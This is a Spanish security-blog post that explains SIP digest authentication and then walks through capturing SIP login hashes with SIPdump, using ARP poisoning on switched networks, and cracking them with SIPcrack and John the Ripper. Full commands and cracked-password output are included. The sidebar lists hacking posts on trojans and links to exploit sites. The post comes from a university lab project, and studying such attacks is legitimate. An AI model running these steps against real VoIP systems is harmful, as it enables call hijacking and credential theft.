Pages

    • Página principal

futuro robot? futuro inerte?

reflexiones de un analisis robot

Banner 1

    Paginas en las que participo

    • CUT

Seguridad en VoIP (I): Cracking de contraseñas SIP en GNU/Linux

Publicado por Unknown en 21:26 miércoles, 17 de septiembre de 2008 Etiquetas: cracking, linux, seguridad, voip

Durante la presente edición del Master en Seguridad de la Información en la Universidad de Deusto he tenido la suerte de dirigir dos proyectos muy buenos sobre Seguridad en VoIP. El primero de ellos, más orientado a la seguridad entre centralitas o PBX, fue realizado por Gaizka Isusquiza, Marcelo Pellón y David Castellanos, y será comentado, muy probablemente, más adelante. El segundo de ellos analizó las herramientas de ataque existentes contra las comunicaciones mediante VoIP y fue realizado por Sara Rincón y María Unda. Durante las siguientes semanas me gustaría ir mostrando todo lo que ellas fueron analizando y probando, e incluso incluiré los vídeos en SWF que realizaron para la presentación final del Proyecto de Fin de Master. Gracias María y Sara por dejarme colgar vuestro material para que todo el mundo lo pueda leer (copyleft rocks!) ;-)

Autenticación en SIP

El protocolo SIP utiliza la autenticación digest para la autenticación de los clientes. La autenticación digest es un mecanismo simple de autenticación desarrollada originalmente para HTTP (se le llama con frecuencia HTTP digest). El mecanismo de autenticación es muy simple, está basado en hashes criptográficos que evitan que se envíe la contraseña de los usuarios en texto claro.

La autenticación digest verifica que las dos partes que se comunican conocen un secreto compartido, que es la contraseña. Cuando un servidor quiere autenticar a un usuario, genera un desafío digest y se lo manda al usuario. Un ejemplo de desafío puede ser el siguiente:

Digest realm="iptel.org", qop="auth,auth-int",
nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="", algorithm=MD5

Consiste en una serie de parámetros que son enviados al usuario. El usuario entonces utiliza los parámetros para generar una respuesta digest adecuada y enviársela al servidor. Los parámetros del desafío digest son los siguientes:

  1. realm: Es un parámetro obligatorio y debe estar presente en todos los desafíos. Su propósito es identificar las credenciales dentro de un mensaje SIP. Normalmente es el dominio del cual el servidor proxy SIP es responsable.
  2. nonce: es un string de datos generado únicamente cada vez que un servidor genera un desafío digest. Se construye a partir del hash MD5 de algún dato. Dicho dato normalmente incluye un sello de tiempo y la frase secreta (contraseña) que tiene el servidor. De esta manera se asegura que cada nonce tenga un tiempo de vida limitado (que no puede volver a ser usado más tarde) y también es único (ningún otro servidor será capaz de generar el mismo nonce). Los clientes generan la respuesta digest a partir del nonce, así el servidor recibirá el contenido del nonce en una respuesta digest. Normalmente verifica la validez del nonce antes de que compruebe el resto de la respuesta digest. De manera que, el nonce es un tipo de identificador que se asegura de que las credenciales digest recibidas han sido realmente generadas para un desafío digest concreto, y además limita el tiempo de vida de la respuesta digest, evitando que se vuelvan a lanzar ataques en el futuro.
  3. opaque: es un string de datos que se envía al usuario en el desafío. El usuario pasará el string de datos de vuelta al servidor en la respuesta digest. Esto permite a los servidores no mantener información sobre el estado. Si hay algún estado que ellos necesitan mantener entre el desafío y la respuesta, pueden pasárselo al cliente utilizando este parámetro y leerlo otra vez más tarde cuando la respuesta digest venga.
  4. algoritmo: el algoritmo utilizado para calcular los hashes. Sólo está soportado MD5.
  5. qop: la protección de la calidad. Especifica qué esquemas de protección soporta el servidor. El cliente elegirá una opción de la lista. El valor “auth” indica sólamente autenticación, el valor “auth-int” indica autenticación con protección de la integridad.

Después de recibir el desafío digest, un agente de usuario pedirá al usuario el nombre de usuario y la contraseña (si no está preconfgurado), generará la respuesta digest y la enviará al servidor. Una respuesta digest podría ser así:

Digest username="jan", realm="iptel.org",
nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="sip:iptel.org",
qop=auth, nc=00000001, cnonce="0a4f113b",
response="6629fae49393a05397450978507c4ef1", opaque=""

Como podemos ver, la respuesta digest es similar al desadío digest. Los parámetros que coinciden tienen el mismo significado que en el desafío digest. Vamos a describir brevemente sólo los siguientes parámetros:

  1. uri: contiene el uri al que el cliente quiere acceder.
  2. qop: el nivel de protección elegido por el cliente.
  3. nc: contador de nonce, el valor es el contador en hexadecimal del número de peticiones (incluyendo la petición actual) que el cliente ha enviado con el nonce en su petición. Por ejemplo, en la primera petición enviada en respuesta a un nonce dado, el cliente manda “nc=00000001″. La finalidad de esta directiva es permitir que el servidor detecte peticiones de replay manteniendo su propia copia de este contador.
  4. cnonce: el valor es un string proporcionado por el cliente y utilizado tanto por el cliente como por el servidor para evitar ataques de texto plano elegidos, para proporcionar autenticación mutua y protección de la integridad del mensaje.
  5. response: es un string generado por el agente de usuario (cliente) que prueba que el usuario sabe la contraseña.

Desde la recepción de una respuesta digest, el servidor recalcula el valor de la respuesta para comparar, utilizando los atributos que da el cliente y el password almacenado en el servidor. Si el resultado es idéntico a la respuesta recibida desde el cliente entonces dicho cliente está autenticado.

Cuando un servidor SIP recibe una petición SIP y quiere verificar la autenticidad del usuario antes de procesar las peticiones, comprueba si la petición contiene las credenciales de digest. Si no hay credenciales en la petición SIP, generará una respuesta final negativa e incluirá el desafío digest en la respuesta.

Cuando el cliente recibe la respuesta conteniendo el desafío digest, debe calcula la respuesta digest adecuada y enviar la petición de nuevo, esta vez incluyendo las credenciales digest. El servidor entonces verifica la respuesta digest y procesa que la petición se ha realizado con éxito. Los agentes de usuario SIP utilizan la respuesta “401 Unauthorized” para incluir el desafío digest.

Un ejemplo de respuesta SIP que contiene el desafío digest:

SIP/2.0 401 Unauthorized.
Via: SIP/2.0/UDP 218.79.100.193:65030;branch=z9hG4bK1ce21dab.
To: "IPTel844978" ;tag=794fe65c16edfdf45da4fc39
From: "IPTel844978" ;tag=1fd6218e.
Call-ID: 2d471abf-c0fbee95-bee93355-fea1736b@218.79.100.193.
CSeq: 88608141 REGISTER.
WWW-Authenticate: Digest realm="iptel.org", \
nonce="3f9fc19cf91f65958f664122c1310d4c28cc61a2".
Content-Length: 0.

El siguiente ejemplo muestra un mensaje REGISTER que contiene las credenciales digest.

REGISTER sip:iptel.org SIP/2.0.
Via: SIP/2.0/UDP 195.37.78.121:5060.
From: sip:jan@iptel.org.
To: sip:jan@iptel.org.
Call-ID: 003094c3-bcfea44f-40bdf830-2a557714@195.37.78.121.
CSeq: 102 REGISTER.
User-Agent: CSCO/4.
Contact: .
Authorization: Digest username="jan",realm="iptel.org",
uri="sip:iptel.org",response="dab81127b9a7169ed57aa4a6ca146184",
nonce="3f9fc0f9619dd1a712b27723398303ea436e839a",algorithm=md5.
Content-Length: 0.
Expires: 10.

sip01.jpg

Proceso de autenticación en SIP

A través de los mensajes REGISTER, los agentes de usuario SIP informan al servidor de su localización actual de manera que el servidor sepa dónde tiene que enviar peticiones posteriores. Si un servidor no autentica las peticiones REQUEST cualquiera puede registrar cualquier contacto para cualquier usuario, y por lo tanto secuestrar llamadas a dicha persona.

Si un atacante captura los mensajes descritos anteriormente, necesarios para registrar a un cliente en un servidor SIP, es capaz de obtener el hash MD5 de la contraseña que ambos comparten. De esta manera está expuesto a los ataques de fuerza bruta y diccionario.

Herramientas de cracking SIP

SIPcrack

SIPcrack es un programa para crackear las contraseñas del protocolo SIP en GNU/Linux. Contiene dos programas: SIPdump para capturar logins de SIP y SIPcrack para crackear los logins capturados. Podemos descargar el código fuente desde la página oficial http://www.codito.de o PacketStorm http://packetstormsecurity.org:

#  wget http://packetstormsecurity.org/Crackers/SIPcrack-0.1.tar.gz
# tar xfz SIPcrack-0.1.tar.gz
# cd SIPcrack-0.1
# make

Capturando tráfico en un entorno conmutado (switches)

En caso de encontrarnos en una red con switches, para poder capturar los logins SIP será necesario llevar a cabo un ataque “man in the middle”, por ejemplo un ARP poisioning mediante el ettercap. El ettercap se encarga de envenenar la cache ARP tanto del cliente como del servidor SIP de manera que nos lleguen los paquetes que se envían para el registro en SIP y de reenviar dichos paquetes a sus destinatarios originales.

Capturando logins SIP con SIPdump

SIPdump captura logins de SIP, pero también analiza tráfico SIP a partir de una captura en formato pcap que haya capturado previamente otro sniffer, como Tcpdump o Ethereal. Para que SIPdump analice dicha captura especificaremos la ruta donde se encuentre dicho fichero con la opción -f y con -d el fichero donde volcará las capturas SIP que encuentre, en caso de no existir previamente, SIPdump lo creará.

# ./sipdump -f capturaSIP.pcap -d fichdump
SIPdump 0.1 ( MaJoMu | www.remote-exploit.org )

* Using tcpdump data file 'capturaSIP.pcap' for sniffing
* Starting to sniff with filter 'tcp or udp'
* Adding 192.168.0.35:50451 <-> 192.168.0.1:50195 to monitor list...id 0
* New traffic on monitored connection 0 (192.168.0.35 -> 192.168.0.1)
* Found challenge response (192.168.0.35:50451 <-> 192.168.0.1:50195)
* Wrote sniffed login 192.168.0.35 -> 192.168.0.1 (User: '200') to dump file
* Exiting, sniffed 1 logins

Además, SIPdump también puede funcionar como sniffer de logins SIP. Para ello debemos especificar la interfaz de red por la cual vamos a esnifar con la opción -i y el nombre del fichero que contendrá todas las capturas SIP con -d:

# ./sipdump -i eth0 -d captura.dump
SIPdump 0.1 ( MaJoMu | www.remote-exploit.org )

* Using dev 'eth0' for sniffing
* Starting to sniff with filter 'tcp or udp'

Una vez puesto a capturar el SIPdump, en otro host de la red abriremos un softphone que se registre contra un servidor Asterisk y haga una llamada:

*  Adding 192.168.1.35:50451 <-> 192.168.1.100:50195 to monitor list...id 0
* New traffic on monitored connection 0 (192.168.1.35 -> 192.168.1.100)
* Found challenge response (192.168.1.35:50451 <-> 192.168.1.100:50195)
* Wrote sniffed login 192.168.1.35 -> 192.168.1.100 (User: '100') to dump file

Crackeando la contraseña usando SIPcrack

Una vez que tenemos el hash de la contraseña del login SIP que hemos capturado previamente, podremos lanzar dos tipos de ataque contra dicho hash: ataque por diccionario o por fuerza bruta.

Ataque por diccionario

Con la opción -w especificamos que vamos a romper la contraseña a partir de un fichero, en este caso un diccionario. Sino tenemos ningún diccionario de castellano instalamos el paquete wspanish desde el apt.

Con la opción -d le indicamos el fichero en el que hemos capturado previamente el login SIP con el SIPdump.

# apt-get install wspanish
# ./sipcrack -w /usr/share/dict/spanish -d captura.dump

A continuación nos aparecerá la lista de logins SIP, con sus hashes correspondientes, que hemos capturado previamente con el SIPdump, de la cual elegiremos cual queremos crackear.

SIPcrack 0.1 ( MaJoMu | www.remote-exploit.org )
--
* Reading and parsing dump file...
* Found Accounts:
Num Server Client User Algorithm Hash / Password

1 192.168.1.100 192.168.1.35 100 MD5 140c0b72f294abd9f4e13eea081a0307

* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash...495ff79e6c8f0378a7c029289a444573
* Starting bruteforce against user '100' (MD5 Hash:
'140c0b72f294abd9f4e13eea081a0307')
* Loaded wordlist: '/usr/share/dict/spanish'
* Tried 47492 passwords in 1 seconds
* Found password: 'hola'
* Updating 'captura.dump'...done

Una vez crackeada la contraseña, la próxima vez que ejecutamos SIPcrack nos la mostrará en texto plano.

Ataque por fuerza bruta

Para realizar este ataque vamos a necesitar el crackeador de contraseñas John the Ripper. Podemos descargarlo desde la página oficial: http://www.openwall.com/john o podemos instalarlo desde el apt:

# apt-get install john

La opción –incremental[=mode] sirve para generar caracteres aleatorios. Mode acepta los siguientes valores:

  1. –incremental=alpha genera letras.
  2. –incremental=digits genera sólo números.
  3. –incremental=all genera caracteres alfanuméricos.

Si no se especifica nada tras la opción ­-incremental, John the ripper probará todas las posibilidades según el fichero de configuración, que se encuentra en /etc/john/john.conf:

[Incremental:All]
File = /usr/share/john/all.chr
MinLen = 5
MaxLen = 5
CharCount = 95

[Incremental:Alpha]
File = /usr/share/john/alpha.chr
MinLen = 5
MaxLen = 5
CharCount = 26

[Incremental:Digits]
File = /usr/share/john/digits.chr
MinLen = 5
MaxLen = 5
CharCount = 10

Con la opción –stdout[:length] lo redirige a la salida estándar. Si conocemos el tamaño máximo de la contraseña a romper podemos especificarlo tras los dos puntos.

Para más información sobre las opciones de John the ripper, en la página oficial hay una documentación online: http://www.openwall.com/john/doc.

Redirigimos la lista de todas las combinaciones posibles a un fichero.

# john --incremental=alpha --stdout > fichero.txt
words: 11881376 time: 0:00:00:03 w/s: 3960458 current: uxjqv

Ahora vamos a romper la contraseña a partir del fichero generado por John the ripper y elegimos el login SIP que vamos a crackear.

# ./sipcrack -w fichero.txt -d captura.dump
SIPcrack 0.1 ( MaJoMu | www.remote-exploit.org )
-----------------------------------------------------------------------------------------------------------------
* Reading and parsing dump file...
* Found Accounts:
Num Server Client User Algorithm Hash / Password
1 192.168.1.100 192.168.1.35 101 MD5 d666ff953dff9b05a54d0457ab671c78
2 192.168.1.100 192.168.1.35 200 PLAIN hola
3 192.168.1.100 192.168.1.35 200 PLAIN hola
4 192.168.1.100 192.168.1.35 101 MD5 da08487896afd6920a077661bfd3997d
* Select which entry to crack (1 - 4): 4
* Generating static MD5 hash...495ff79e6c8f0378a7c029289a444573
* Starting bruteforce against user '101' (MD5 Hash:
'da08487896afd6920a077661bfd3997d')
* Loaded wordlist: 'fichero.txt'
* Tried 5585 passwords in 0 seconds
* Found password: 'asdfg'
* Updating 'captura.dump'...done

Video/demostración de este ataque

En http://paginaspersonales.deusto.es/garaizar/VoIP/crackingVoIPGNULinux.html está colgado el video de demostración de este ataque en el entorno de pruebas que prepararon Sara y María.


Fuente:http://blog.txipinet.com/2006/10/11/38-seguridad-en-voip-i-cracking-de-contrasenas-sip-en-gnu-linux/

No hay comentarios:

Publicar un comentario

Entrada más reciente Entrada antigua Inicio
Suscribirse a: Enviar comentarios (Atom)

Buscar este blog

Herramientas online

  • Base de datos de Pines WPS
  • Base de datos de Exploits
  • Diccionarios WPA
  • Inj3ctor - Exploits gratis y pagos
  • Ver y publicar desfacement
  • cxsecurity - Listado actualizado de Exploits
  • Noticias actualizadas de seguridad informatica
  • Packet storm - Lista de exploit, vulerabilidades, etc
  • Buscador de exploits
  • Convertidor de youtube a mp3 con tag

Suscribirse a

Entradas
Atom
Entradas
Comentarios
Atom
Comentarios

Followers

Blog Archive

  • ►  2016 (5)
    • ►  julio (5)
  • ►  2014 (268)
    • ►  noviembre (102)
    • ►  octubre (10)
    • ►  septiembre (40)
    • ►  agosto (9)
    • ►  julio (29)
    • ►  mayo (51)
    • ►  abril (19)
    • ►  marzo (4)
    • ►  enero (4)
  • ►  2013 (38)
    • ►  diciembre (10)
    • ►  octubre (15)
    • ►  septiembre (12)
    • ►  enero (1)
  • ►  2012 (139)
    • ►  noviembre (44)
    • ►  septiembre (9)
    • ►  agosto (19)
    • ►  julio (39)
    • ►  junio (11)
    • ►  mayo (16)
    • ►  marzo (1)
  • ►  2011 (12)
    • ►  diciembre (2)
    • ►  junio (7)
    • ►  mayo (1)
    • ►  enero (2)
  • ►  2010 (64)
    • ►  diciembre (3)
    • ►  octubre (3)
    • ►  septiembre (4)
    • ►  agosto (9)
    • ►  julio (1)
    • ►  junio (11)
    • ►  mayo (5)
    • ►  abril (2)
    • ►  marzo (3)
    • ►  febrero (12)
    • ►  enero (11)
  • ►  2009 (375)
    • ►  diciembre (14)
    • ►  noviembre (7)
    • ►  octubre (23)
    • ►  septiembre (2)
    • ►  agosto (7)
    • ►  julio (5)
    • ►  junio (10)
    • ►  mayo (7)
    • ►  abril (35)
    • ►  marzo (76)
    • ►  febrero (53)
    • ►  enero (136)
  • ▼  2008 (643)
    • ►  diciembre (56)
    • ►  noviembre (8)
    • ►  octubre (19)
    • ▼  septiembre (129)
      • [Bluetooth] PIN Cracking
      • [Bluetooth] Ataque Blue MAC Spoofing
      • [Bluetooth] Introducción y seguridad
      • http://isatcis.com/number8.htm
      • nivel 1 isatcis
      • Apartir de Hoy vamos a empezar con los retos de ht...
      • Helix 3 Released [Version 2008R1(2.0)] - Forensics...
      • Samurai - Web Testing Framework LiveCD
      • mas humor para relax :D
      • Jugando con /etc/passwd (Sistemas Linux/Unix con c...
      • intrusion en computadoras en lan
      • Ataque MITM (Man In The Middle)
      • Ataque D.o.S. en redes conmutadas (Switched)
      • Sniffing: Caín & Abel III (Instalando a Abel remot...
      • Sniffing: Caín & Abel II (DNS poisoning)
      • Sniffing: Caín & Abel
      • Video: Interceptando contraseñas en nuestra red
      • Recuperación del password del Telsey de Comunitel ...
      • Cómo hacer el troyano Bifrost indetectable a los a...
      • Tutorial poison ivy 2.3.0
      • [TUTORIAL] Uso del poison ivy
      • manual hackear php-nuke
      • hackear webspacemania (gratishost)
      • HACKEAR HOTMAIL *Xploid windows live new*
      • Msn Nightmare Espia Conversacio (tiempo Real)
      • Videotutorial para instalar Wordpress con Xampp
      • Tutorial de Python 'Python para todos'
      • Videotutorial CAIN & ABEL
      • Seguridad en VoIP (II): Cracking de contraseñas SI...
      • Seguridad en VoIP (I): Cracking de contraseñas SIP...
      • Investigando el registro de windows
      • Rompiendo WEP en redes Wireless...
      • Pruebas con WPA-PSK
      • Utilidad para analizar discos duros: Active@ Hard ...
      • Administrar los programas que se inician junto con...
      • Especial registro del sistema: Optimización y resp...
      • Folder Guide: Un rápido acceso a las carpetas de u...
      • Trabaja con cuatro escritorios virtuales en Window...
      • Descubre qué se imprime en tu PC con Karen’s Print...
      • DVDSmith Movie Backup: Haz copias de seguridad a t...
      • DVDSmith Movie Backup: Haz copias de seguridad a t...
      • Haz una imagen (backup) de tu disco duro con O&O D...
      • 1er Simposio sobre la ley de Delitos Informáticos ...
      • Auditoria de seguridad de servicios Web, basada en...
      • Fake YouTube Page Creator
      • Falsos sitios antivirus para la diseminación del m...
      • InjectionDenied: detección y bloqueo de ataques PH...
      • cd recovery toolbox (FREE)
      • Seguridad en dispositivos USB: Protegiendo los dis...
      • Graba tu escritorio con VLC
      • Activar usuario root en Ubuntu
      • Filtrando paquetes en Wireshark [video tutorial]
      • El ataque Man In the Middle [video tutoriales]
      • Delitos tecnológicos: la investigación de escenarios
      • Guía para la recogida de evidencias forenses
      • Manipular PDF en Ubuntu
      • Aumenta la velocidad de Ubuntu
      • OpenDNS como servidor DNS Alternativo en UBUNTU
      • Tips: Resetear password en Ubuntu
      • Gmail permite la desconexión de sesiones de forma ...
      • Mejorando la protección antivirus casera
      • Localizar un portátil robado
      • Encontre este manual para utilizar el commview par...
      • DenyHosts, una magnífica herramienta
      • video tutorial Usar tcpxtract para recuperar archi...
      • linux - programas indespensables
      • Como Hackear Telefonos por Bluetooth
      • Roba datos usb y contramedidas
      • [Blueline] Motorola RAZR V3
      • Video Headsets Hijacking
      • Avances en sniffing Bluetooth
      • mas humor
      • Headsets Hijacking
      • Manual De NMAP completisimo!
      • Revistas Recomendadas para Los Newbi
      • Html Injections .¿El Porque? y ¿Como Solucionarlos...
      • Videos hacking
      • ¿ Qué son los archivos DLL?
      • Instalar cliente VPN en 3 pasos
      • Tutorial: Crear Plasmoide en Gimp
      • Curso de Reparación de Impresoras
      • Guía de recuperación de contraseñas de Administrad...
      • Buscando passwords inseguros con Hydra
      • Esnifando redes conmutadas[arp spoof + MitM + Snif...
      • Hablemos de Wifislax
      • Principales usos del NetCat
      • Nmap, uso de los parámetros
      • Que es un ataque RFI(Remote File Inclusion)
      • Injection HTML
      • Vulnerabilidad en “Xt-NewsPowered”
      • Video tutoriales sobre Hacking
      • Como Hacer una envenenacion ARP en una Red
      • Super usuario dentro de Linux
      • mas comandos dos
      • Proxys web
      • Wireshark. Analiza el tráfico de una red
      • como hacker una red wifi
      • una sesión nula (mplayer2)
      • Control con solo tener IP.
      • Documento técnico: Análisis forense en dispositivo...
    • ►  agosto (172)
    • ►  julio (259)
  • ►  2007 (1)
    • ►  diciembre (1)

Paginas Recomendadas

  • Sitio centralizado para wargames
  • list of security
  • Security Focus
  • Injector
  • XSSPOSED
  • pentestmonkey
  • Calidad de desarrollo - curso completo pruebas
  • Completo de Ingeniera del software - Pruebas
  • No Quality Inside - Excelente de pruebas
  • MArk´s blog (Forensic)
  • Computer forensics SANS
  • Comunidad excelente para moviles :D
  • El diario de juanito
  • Conexion inversa
  • Neo System
  • Black portal
  • PENTESTER
  • AUDITORÍA DE SEGURIDAD PARA EMPRESAS
  • Los simpsons cada semana :D
  • Sirius
  • PenTestIT
  • Open Source Digital Forensics

Colaboradores

  • Sam
  • Unknown

chat

Entradas populares

  • Inyeccion SQL al completo ( todas las inyecciones )
    Aqui dejo esta recopilacion con las diferentes tipos de inyecciones que encontre ,todas estan probadas por mi y por supuesto aunque es algo ...
  • 170 Videos De Hacking
    nunca me canse de repetirles a mis conocidos ke #RE es el mejor foro de todos en el under cosas como estas se pueden encontrar dentro del fo...
  • Restaurar/Ver chats de WhatsApp en crypt7
    Suele ser bastante común que nos pidan recuperar algunos chats de WhatsApp que han sido borrados anteriormente de forma no intencionada. V...
  • Videos hacking
    Una recopilacion de todos los videos con tecnicas propias del hacking, aportados en Club Hacker. Posteadas por hack_crack y yo x) ----------...
  • y mas google dorks?
    Si como dice el titulo dejo mas dorks para que practiquen.... SQL Kahfie .php?my=" .php?a=" .php?f=" .php?z=" .ph...
  • Nueva técnica para hackear dispositivos móviles mediante comandos de voz ocultos en vídeos de Youtube
    Un grupo de investigadores de la Universidad de Berkeley California y la Universidad de Georgetown ha ideado un método para hackear disposit...
  • Como saber el origen de un tuit? quien fue el primero?
    ¿Nunca os da rabia cuando veis que alguien, en vez de retuitear algún mensaje de Twitter, lo copia y pega para que parezca que lo ha escr...
  • shard: una herramienta para comprobar si se utiliza la misma contraseña en varios sitios
    Si hay algo imperativo en la sociedad digital actual es NO REUTILIZAR la misma contraseña para distintos servicios. La razón es simple: si...
  • Recuperar información eliminada de BBDD SQLite #Forsensics #SQLite #Python
    Buena entrada de mis rss favoritos: Hace unos años, mientras escribía  Hacker Épico , me leía las especificaciones del formato de los fic...
  • Cómo saber el WhatsApp de alguien con WhatsApp Discover
    A finales del verano pasado, justo antes de las vacaciones, y de la importante decisión de abandonar mi cálida isla de Tenerife para tras...

Labels

404 (1) acceso (1) administracion (3) adobe (1) aio (1) aircrack (2) ams (1) and (1) android (35) antiforense (6) apache (1) apk (2) archivos (1) armitage (1) articulos (1) asesorias (1) asm (2) ataques (39) auditoria (72) autentificacion (1) ayudas (1) backdoor (2) backtrack (19) backup (4) bad_robot (5) bash (2) batch (2) binarios (4) blog (2) Blueline (1) Bluetooth (7) borrado de huellas (1) borrado seguro (2) botnets (3) bruter (1) bugs (1) buscador (11) bypass (12) cain (11) calidad (2) capcha (1) captcha (2) car (1) carding (2) centralizar logs (1) cerraduras (1) certificaciones (1) chats (2) chistes cortos (1) chrome (1) ciber (1) ciencia (6) cisco (2) cmd (5) CodigoQR (1) colombia (3) comandos (16) Commview (1) compartir (2) comunicaciones (1) conspiracion (2) contramedidas (1) contraseñas (13) control ip (1) convertidor (1) convocatoria (1) cookie (3) correo (12) cracking (56) creacion (1) credenciales (1) criptoanalisis (3) criptografia (16) curiosidades (4) Curso (34) datos (1) day0 (2) dcom (1) dd (1) ddos (2) defcon (1) delitos informaticos (4) denyhost (1) desarrollo (1) descargas (2) desfacing (36) deteccion (1) dll (3) dns (8) dns poisoning (3) documentos (70) dorks (2) Dos (13) dropbox (1) drupal (1) encriptacion (5) entrenamientos (1) envenenacion arp (2) envenenamiento (2) escaneos (4) espia (5) estenografia (11) ethical hacking (1) evasión (1) examenes (1) excel (2) exploit (11) explotar (2) facebook (5) fake ap (2) fake site (1) fake web (1) fbi (3) feliz año (1) feliz dia (1) feliz navidad 2009 (2) file upload (1) finger (1) firefox (4) firewalls (8) firma digital (1) flash (2) foca (1) Forense (301) foros (1) freebsd (1) ftp (3) fundamentales (1) futbol (1) fuzzer (1) gestion (1) gimp (1) gmail (4) google hacking (8) googling (2) gtalk (1) hackin9 (4) hacking (225) hackit (4) hamachi (1) hash (6) hd (1) herramientas (21) herramientas fundamentales (7) hijacking headsets (2) honey (4) hosting (1) hoteles (1) hotmail (2) hotspot (2) html (3) http (11) https (2) humor (72) hydra (2) icmp (1) ids (2) imagenes (1) importante (4) impresion (1) indetectable (3) informatica (8) informes (1) ingenieria inversa (14) ingenieria social (7) ingles (3) iniciacion (1) instagram (1) internet (15) intrusion (4) investigaciones (8) inyeccion (26) iphone (1) ips (1) ipv6 (2) isatcis (2) iso (1) java (4) javascript (2) joomla (4) jquery (2) juegos (6) kali (5) karmetasploit (1) keyloggers (2) laboratorios (79) lan (2) lh (2) libros (8) linux (104) livecd (5) logs (4) mac (1) macos (1) magia (1) maltego (1) malware (12) man in the middle (4) manizales (1) manual (1) md5 (8) memorias (5) metadatos (8) metasploit (29) meterpreter (6) microsoft (1) mit (1) mongoDB (2) monitoreo de logs (1) moodle (1) moviles (18) msn (6) musica (1) mysql (3) n900 (2) nagios (1) nasa (1) navegacion anonima (6) navegadores (4) nemesis (3) netcat (2) nmap (3) node.js (1) NoSQL (3) noticias (38) nube (1) nuevos escritores (1) ocultacion (1) ofuscar (3) oracle (2) otro idioma (5) outlook (1) owasp (4) p2p (1) paginas vulnerables (1) paint (1) pasa tiempo (1) passwords (14) payloads (1) pdf (4) Peliculas (10) Penetration Test (42) php (7) php-nuke (1) picking (1) poison-ivy (2) politica (3) portales cautivos (2) portatiles (1) post-explotacion (2) powershell (1) practica3 (3) practicas (1) presentacion (1) privilegios (6) problemas tecnicos (1) problematicas (1) procesos (4) productos propios (8) programacion (24) Programas (113) proxy (6) prxys web (1) psk (1) publicidad (1) puertos (1) python (2) qa (1) ram (5) rdp (3) recuperacion (3) recuperacion cds (1) recuperacion claves (1) recuperacion.root (1) redes (11) reflexiones (1) registro (4) relax (2) remoto (3) reparacion (1) reseller (1) retos (11) revistas (8) rfi (2) ripper (1) robots (1) root (6) rooteo (3) rootkit (2) routers (2) s.o (1) safari (1) sandbox (2) sans (1) scam (1) scanning (6) seguridad (150) semana1 (1) servicios (6) sesion (2) sha (2) shell (14) shellshock (4) shh (1) sidehacking (1) SIEM (1) skype (3) slipknot (3) sniffing (19) soap (2) soluciones (1) spoofing (3) sql (18) sql injection (17) sql map (1) sqlite (1) ssh (3) ssi (1) ssl (2) taller (2) tampering (1) tap (1) telsey (1) testing (11) Themida (1) tor (4) trackers (1) trafico (10) troyano (17) trucos (20) trucoss (1) tuneles (3) Tutorial (91) ubuntu (7) universidad (7) upload (2) upnp (1) usb (12) varios (1) video tutoriales (18) videos (31) virtualbox (1) virtuales (8) virus (4) vnc (1) voip (4) volcado (2) vpn (4) vulnerabilidades (22) waf (1) Wardrivers (1) wardriving (1) wargames (1) web (43) web services (3) webcam (2) wep (4) wget (2) whatsapp (4) wifi (35) wifislax (4) windows (83) WireShark (17) wordpress (3) wpa (4) WPS (2) xml (1) xmpp (1) xp (1) xss (12) youtube (2) zip (1)
Copyright © futuro robot? futuro inerte?
Powered by Bad Robot
Helped by Blackubay